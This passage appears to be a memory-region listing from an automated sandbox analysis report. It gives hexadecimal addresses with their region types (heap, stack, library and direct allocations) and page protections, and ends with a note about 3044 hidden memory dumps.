trusted library allocation
|
page read and write
|
||
28E2CEB3000
|
heap
|
page read and write
|
||
DFF4CFF000
|
stack
|
page read and write
|
||
28C88B3F000
|
heap
|
page read and write
|
||
288117A000
|
stack
|
page read and write
|
||
28B6331E000
|
heap
|
page read and write
|
||
28E2ED24000
|
heap
|
page read and write
|
||
28C877CE000
|
heap
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
1F23A75E000
|
heap
|
page read and write
|
||
1F23A763000
|
heap
|
page read and write
|
||
257A3151000
|
heap
|
page read and write
|
||
1436DA29000
|
heap
|
page read and write
|
||
9410FDF000
|
stack
|
page read and write
|
||
16182E5C000
|
trusted library allocation
|
page read and write
|
||
B513A7F000
|
stack
|
page read and write
|
||
21AD4641000
|
heap
|
page read and write
|
||
1BC8A8A1000
|
heap
|
page read and write
|
||
25CAEDE0000
|
heap
|
page read and write
|
||
1619A330000
|
trusted library allocation
|
page read and write
|
||
16182B94000
|
trusted library allocation
|
page read and write
|
||
1436E115000
|
heap
|
page read and write
|
||
28C87CB0000
|
heap
|
page read and write
|
||
1BC8A850000
|
heap
|
page read and write
|
||
28C88B2F000
|
heap
|
page read and write
|
||
1C7FBA61000
|
heap
|
page read and write
|
||
1E19FFC2000
|
heap
|
page read and write
|
||
28E2ED1E000
|
heap
|
page read and write
|
||
266C3E80000
|
heap
|
page read and write
|
||
28C88B73000
|
heap
|
page read and write
|
||
28C87680000
|
heap
|
page read and write
|
||
18A64C21000
|
heap
|
page read and write
|
||
7FF847A30000
|
trusted library allocation
|
page read and write
|
||
1436F9B2000
|
heap
|
page read and write
|
||
7FF847870000
|
trusted library allocation
|
page execute and read and write
|
||
21AD462A000
|
heap
|
page read and write
|
||
21AD4641000
|
heap
|
page read and write
|
||
14B35A93000
|
heap
|
page read and write
|
||
17342DD9000
|
heap
|
page read and write
|
||
1F23A769000
|
heap
|
page read and write
|
||
1F23A7D0000
|
heap
|
page read and write
|
||
28C87310000
|
heap
|
page read and write
|
||
1F23DC66000
|
direct allocation
|
page read and write
|
||
28C87320000
|
heap
|
page read and write
|
||
28C87D94000
|
heap
|
page read and write
|
||
1E1A0044000
|
heap
|
page read and write
|
||
1F23A78A000
|
heap
|
page read and write
|
||
28C88906000
|
heap
|
page read and write
|
||
28C87308000
|
heap
|
page read and write
|
||
7FF8B8B11000
|
unkown
|
page execute and read and write
|
||
28C87CB5000
|
heap
|
page read and write
|
||
27258B11000
|
heap
|
page read and write
|
||
1619A48C000
|
heap
|
page read and write
|
||
28C88630000
|
direct allocation
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
1619A210000
|
heap
|
page read and write
|
||
2882207000
|
stack
|
page read and write
|
||
22AE1370000
|
heap
|
page read and write
|
||
1F23A74E000
|
heap
|
page read and write
|
||
18EBB2D0000
|
heap
|
page read and write
|
||
1CCD86D2000
|
heap
|
page read and write
|
||
18A64BD0000
|
heap
|
page read and write
|
||
14B35A9E000
|
heap
|
page read and write
|
||
17341166000
|
heap
|
page read and write
|
||
28E2D47C000
|
heap
|
page read and write
|
||
1E19FFC5000
|
heap
|
page read and write
|
||
1F23A8C0000
|
direct allocation
|
page read and write
|
||
1436E118000
|
heap
|
page read and write
|
||
C0A61DB000
|
stack
|
page read and write
|
||
1F23A781000
|
heap
|
page read and write
|
||
1B839C2B000
|
heap
|
page read and write
|
||
28C8734B000
|
heap
|
page read and write
|
||
22AE13C4000
|
heap
|
page read and write
|
||
28C87D94000
|
heap
|
page read and write
|
||
28C8874D000
|
heap
|
page read and write
|
||
246E5290000
|
heap
|
page read and write
|
||
28E2CFB3000
|
heap
|
page read and write
|
||
28C8732E000
|
heap
|
page read and write
|
||
1C7FBA61000
|
heap
|
page read and write
|
||
18A64DD0000
|
heap
|
page read and write
|
||
18EBB7FC000
|
heap
|
page read and write
|
||
28B63318000
|
heap
|
page read and write
|
||
182DF965000
|
heap
|
page read and write
|
||
20D5DE93000
|
heap
|
page read and write
|
||
14B3551D000
|
heap
|
page read and write
|
||
28E2CD70000
|
trusted library allocation
|
page read and write
|
||
28E2CEB6000
|
heap
|
page read and write
|
||
1436DA19000
|
heap
|
page read and write
|
||
1F23A7C6000
|
heap
|
page read and write
|
||
1733EED0000
|
heap
|
page read and write
|
||
28C8767C000
|
heap
|
page read and write
|
||
28C8874F000
|
heap
|
page read and write
|
||
12FA27F000
|
stack
|
page read and write
|
||
7FF8B9060000
|
unkown
|
page readonly
|
||
28FE1241000
|
heap
|
page read and write
|
||
7FF8BFABC000
|
unkown
|
page execute and write copy
|
||
28E2CE5D000
|
heap
|
page read and write
|
||
18EBB099000
|
heap
|
page read and write
|
||
28C88A48000
|
heap
|
page read and write
|
||
F135FF000
|
stack
|
page read and write
|
||
1AC9F669000
|
heap
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
28C88234000
|
direct allocation
|
page read and write
|
||
1CCD86D0000
|
heap
|
page read and write
|
||
28C87D8F000
|
heap
|
page read and write
|
||
15373A70000
|
heap
|
page read and write
|
||
1BD201F1000
|
heap
|
page read and write
|
||
1BF4F6F1000
|
heap
|
page read and write
|
||
28E2CD70000
|
trusted library allocation
|
page read and write
|
||
1F23DD10000
|
direct allocation
|
page read and write
|
||
7FF847AC0000
|
trusted library allocation
|
page execute and read and write
|
||
28C873C5000
|
heap
|
page read and write
|
||
28C88906000
|
heap
|
page read and write
|
||
257A314E000
|
heap
|
page read and write
|
||
18EBB0F8000
|
heap
|
page read and write
|
||
28C88610000
|
direct allocation
|
page read and write
|
||
28815BE000
|
stack
|
page read and write
|
||
7FF7F7E80000
|
unkown
|
page readonly
|
||
28B63230000
|
heap
|
page read and write
|
||
7FF8B8B40000
|
unkown
|
page execute and write copy
|
||
14B35A70000
|
heap
|
page read and write
|
||
28C87CA2000
|
heap
|
page read and write
|
||
22AE13A9000
|
heap
|
page read and write
|
||
28FE1237000
|
heap
|
page read and write
|
||
18EBB0FD000
|
heap
|
page read and write
|
||
28C88B55000
|
heap
|
page read and write
|
||
28C872D0000
|
direct allocation
|
page read and write
|
||
28C87DCA000
|
heap
|
page read and write
|
||
D5386FF000
|
stack
|
page read and write
|
||
7FF84775C000
|
trusted library allocation
|
page execute and read and write
|
||
28C8772D000
|
heap
|
page read and write
|
||
28C87CFD000
|
heap
|
page read and write
|
||
28C87CBA000
|
heap
|
page read and write
|
||
21AD4720000
|
heap
|
page read and write
|
||
25CAEB61000
|
heap
|
page read and write
|
||
1F23A7C9000
|
heap
|
page read and write
|
||
1F23A7E7000
|
heap
|
page read and write
|
||
1F23DBD0000
|
direct allocation
|
page read and write
|
||
28C877D5000
|
heap
|
page read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
7FF8A813E000
|
unkown
|
page execute and read and write
|
||
28C87302000
|
heap
|
page read and write
|
||
28C88298000
|
direct allocation
|
page read and write
|
||
51AD77F000
|
stack
|
page read and write
|
||
1F23A764000
|
heap
|
page read and write
|
||
18EBB7FC000
|
heap
|
page read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
28C87D6C000
|
heap
|
page read and write
|
||
DFF4D7F000
|
stack
|
page read and write
|
||
1D6085E0000
|
heap
|
page read and write
|
||
1F23DCA0000
|
direct allocation
|
page read and write
|
||
153715D3000
|
heap
|
page read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
1E19FF70000
|
trusted library allocation
|
page read and write
|
||
28C87D23000
|
heap
|
page read and write
|
||
1436D9EC000
|
heap
|
page read and write
|
||
16191CB1000
|
trusted library allocation
|
page read and write
|
||
28C87CC8000
|
heap
|
page read and write
|
||
68D9EFF000
|
unkown
|
page read and write
|
||
28C87C6D000
|
heap
|
page read and write
|
||
182DF997000
|
heap
|
page read and write
|
||
15301CB8000
|
trusted library allocation
|
page read and write
|
||
1436D9F5000
|
heap
|
page read and write
|
||
2331558B000
|
heap
|
page read and write
|
||
1F23C204000
|
heap
|
page read and write
|
||
28C87C70000
|
heap
|
page read and write
|
||
173422D0000
|
heap
|
page read and write
|
||
F00ACFE000
|
unkown
|
page read and write
|
||
7FF8BFAB0000
|
unkown
|
page readonly
|
||
173422B2000
|
heap
|
page read and write
|
||
7FF847970000
|
trusted library allocation
|
page read and write
|
||
1F23A768000
|
heap
|
page read and write
|
||
161831A1000
|
trusted library allocation
|
page read and write
|
||
28C877BA000
|
heap
|
page read and write
|
||
28FE1241000
|
heap
|
page read and write
|
||
28FE1220000
|
heap
|
page read and write
|
||
28C88B7F000
|
heap
|
page read and write
|
||
28C87B3D000
|
heap
|
page read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
1436D9C8000
|
heap
|
page read and write
|
||
28C88B3F000
|
heap
|
page read and write
|
||
7FF8478C0000
|
trusted library allocation
|
page read and write
|
||
1A6A1450000
|
heap
|
page read and write
|
||
16181B49000
|
heap
|
page read and write
|
||
18EBB829000
|
heap
|
page read and write
|
||
1B839C27000
|
heap
|
page read and write
|
||
1E1A0640000
|
heap
|
page read and write
|
||
28C87C97000
|
heap
|
page read and write
|
||
28C87BFE000
|
heap
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
28C87C97000
|
heap
|
page read and write
|
||
28811FE000
|
stack
|
page read and write
|
||
18EBB804000
|
heap
|
page read and write
|
||
7FF8B8CE9000
|
unkown
|
page execute and read and write
|
||
28C87CD7000
|
heap
|
page read and write
|
||
28C87D8C000
|
heap
|
page read and write
|
||
28C886C0000
|
direct allocation
|
page read and write
|
||
28C8873B000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
18EBD0AD000
|
heap
|
page read and write
|
||
28C88F60000
|
direct allocation
|
page read and write
|
||
28C872FC000
|
heap
|
page read and write
|
||
1E19FF70000
|
trusted library allocation
|
page read and write
|
||
18EBD0A2000
|
heap
|
page read and write
|
||
7FF8479FA000
|
trusted library allocation
|
page read and write
|
||
173409F5000
|
heap
|
page read and write
|
||
7FF73AE4E000
|
unkown
|
page write copy
|
||
1BC8A770000
|
heap
|
page read and write
|
||
17341C9D000
|
heap
|
page read and write
|
||
1436D9E3000
|
heap
|
page read and write
|
||
28C87C76000
|
heap
|
page read and write
|
||
28E2D484000
|
heap
|
page read and write
|
||
28C873DE000
|
heap
|
page read and write
|
||
DFF4C7B000
|
stack
|
page read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
17342258000
|
heap
|
page read and write
|
||
18EBB0E3000
|
heap
|
page read and write
|
||
161834AF000
|
trusted library allocation
|
page read and write
|
||
7FF8BA259000
|
unkown
|
page readonly
|
||
28C88B5F000
|
heap
|
page read and write
|
||
28C87DA0000
|
heap
|
page read and write
|
||
4B4C4BB000
|
stack
|
page read and write
|
||
14B35528000
|
heap
|
page read and write
|
||
4D5CCFE000
|
stack
|
page read and write
|
||
7FF8A824E000
|
unkown
|
page execute and read and write
|
||
28C88F70000
|
direct allocation
|
page read and write
|
||
1EE628C0000
|
heap
|
page read and write
|
||
153715E3000
|
heap
|
page read and write
|
||
1618359C000
|
trusted library allocation
|
page read and write
|
||
7FF8479FC000
|
trusted library allocation
|
page read and write
|
||
15373686000
|
heap
|
page read and write
|
||
28E2CEB6000
|
heap
|
page read and write
|
||
28B63325000
|
heap
|
page read and write
|
||
28C88660000
|
direct allocation
|
page read and write
|
||
1436DA33000
|
heap
|
page read and write
|
||
7FF847940000
|
trusted library allocation
|
page read and write
|
||
28C87C77000
|
heap
|
page read and write
|
||
28C88862000
|
heap
|
page read and write
|
||
161802F0000
|
heap
|
page readonly
|
||
1436D9E1000
|
heap
|
page read and write
|
||
6A088FB000
|
stack
|
page read and write
|
||
F00ADFF000
|
stack
|
page read and write
|
||
1619A232000
|
heap
|
page read and write
|
||
21AD4740000
|
heap
|
page read and write
|
||
28C87682000
|
heap
|
page read and write
|
||
14B35A9E000
|
heap
|
page read and write
|
||
28C87BFE000
|
heap
|
page read and write
|
||
2720DB29000
|
heap
|
page read and write
|
||
28C87C90000
|
heap
|
page read and write
|
||
28C87CA2000
|
heap
|
page read and write
|
||
257A312B000
|
heap
|
page read and write
|
||
16183266000
|
trusted library allocation
|
page read and write
|
||
1EE13790000
|
heap
|
page read and write
|
||
28CC32E2000
|
heap
|
page read and write
|
||
7FF7F7F28000
|
unkown
|
page readonly
|
||
17342260000
|
heap
|
page read and write
|
||
2720DDE0000
|
heap
|
page read and write
|
||
1436F9B0000
|
heap
|
page read and write
|
||
1436D9FD000
|
heap
|
page read and write
|
||
17342270000
|
heap
|
page read and write
|
||
7FF847910000
|
trusted library allocation
|
page read and write
|
||
20D5DEF9000
|
heap
|
page read and write
|
||
28C88B63000
|
heap
|
page read and write
|
||
28C88B6D000
|
heap
|
page read and write
|
||
7FF8B8CB0000
|
unkown
|
page readonly
|
||
161801AF000
|
heap
|
page read and write
|
||
28C88794000
|
heap
|
page read and write
|
||
E8CB8FF000
|
stack
|
page read and write
|
||
28E2D4A0000
|
heap
|
page read and write
|
||
28C87C88000
|
heap
|
page read and write
|
||
7FF73AE50000
|
unkown
|
page read and write
|
||
1AC9F5C0000
|
heap
|
page read and write
|
||
28C8734E000
|
heap
|
page read and write
|
||
28C87CB0000
|
heap
|
page read and write
|
||
6768AFF000
|
stack
|
page read and write
|
||
28C88B7D000
|
heap
|
page read and write
|
||
28E2CEBD000
|
heap
|
page read and write
|
||
38EFD9C000
|
stack
|
page read and write
|
||
28C88640000
|
direct allocation
|
page read and write
|
||
28C880A0000
|
direct allocation
|
page read and write
|
||
4D5CA7B000
|
stack
|
page read and write
|
||
1EE13580000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
2238D170000
|
heap
|
page read and write
|
||
18EBB6A5000
|
heap
|
page read and write
|
||
21D4D820000
|
heap
|
page read and write
|
||
1E1A01B5000
|
heap
|
page read and write
|
||
1B839BC5000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
B2C24FF000
|
stack
|
page read and write
|
||
28C876B1000
|
heap
|
page read and write
|
||
4084FF000
|
stack
|
page read and write
|
||
1C7FBA61000
|
heap
|
page read and write
|
||
20C0AC3B000
|
heap
|
page read and write
|
||
28C88610000
|
direct allocation
|
page read and write
|
||
14B354D7000
|
heap
|
page read and write
|
||
28C87B55000
|
heap
|
page read and write
|
||
28CC32BA000
|
heap
|
page read and write
|
||
1733EFCE000
|
heap
|
page read and write
|
||
18EBB0E3000
|
heap
|
page read and write
|
||
173423C5000
|
heap
|
page read and write
|
||
18EBD0AD000
|
heap
|
page read and write
|
||
1D608347000
|
heap
|
page read and write
|
||
7FF73AE52000
|
unkown
|
page readonly
|
||
28C88F51000
|
heap
|
page read and write
|
||
28C88A6B000
|
heap
|
page read and write
|
||
1F23A799000
|
heap
|
page read and write
|
||
1BC8A8A1000
|
heap
|
page read and write
|
||
B0630FE000
|
unkown
|
page read and write
|
||
257A315A000
|
heap
|
page read and write
|
||
1436D9A2000
|
heap
|
page read and write
|
||
28C87308000
|
heap
|
page read and write
|
||
1F23A7DE000
|
heap
|
page read and write
|
||
7FF8476BB000
|
trusted library allocation
|
page execute and read and write
|
There are 3044 hidden memdumps, click here to show them.